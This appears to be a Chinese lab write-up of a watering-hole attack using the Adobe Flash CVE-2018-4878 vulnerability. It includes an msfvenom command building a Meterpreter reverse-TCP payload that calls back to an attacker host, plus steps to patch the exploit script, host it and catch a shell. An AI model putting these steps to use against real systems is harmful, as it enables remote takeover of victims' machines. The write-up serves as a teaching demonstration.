水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab

Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。
攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会触发漏洞,可直接getshell。准备工作:靶机信息:192.168.2.134(windows 7 SP1)Flash版本:28.0.0.137攻击机信息:192.168.2.132(kali linux)漏洞利用脚本:CVE-2018-4878-master漏洞利用:

1.使用msfvenom生成shellcode,msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.132 LPORT=7777 -f python>shellcode.txt>。

图片[1]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科

2.替换原 cve-2018-4878.py中的shellcode,并修改参数stageless=False。图片[2]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科3.在代码中修改要生成的文件和路径。图片[3]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科4.执行修改后的cve-2018-4878.py文件,生成index和exploit两个文件。图片[4]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科5.将生成的两个文件复制到web目录环境下。图片[5]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科6.在kali的msf中启用监听。图片[6]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科7.在win7主机中使用含漏洞的浏览器和Adobe Flash访问http://192.168.2.132/index.html,kali中即可获取到靶机会话。

图片[7]-水坑攻击–Adobe flash player 28漏洞(CVE-2018-4878) – 作者:龙渊实验室LongYuanLab-安全小百科

原文链接

来源:freebuf.com 2020-08-17 14:19:01 by: 龙渊实验室LongYuanLab

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论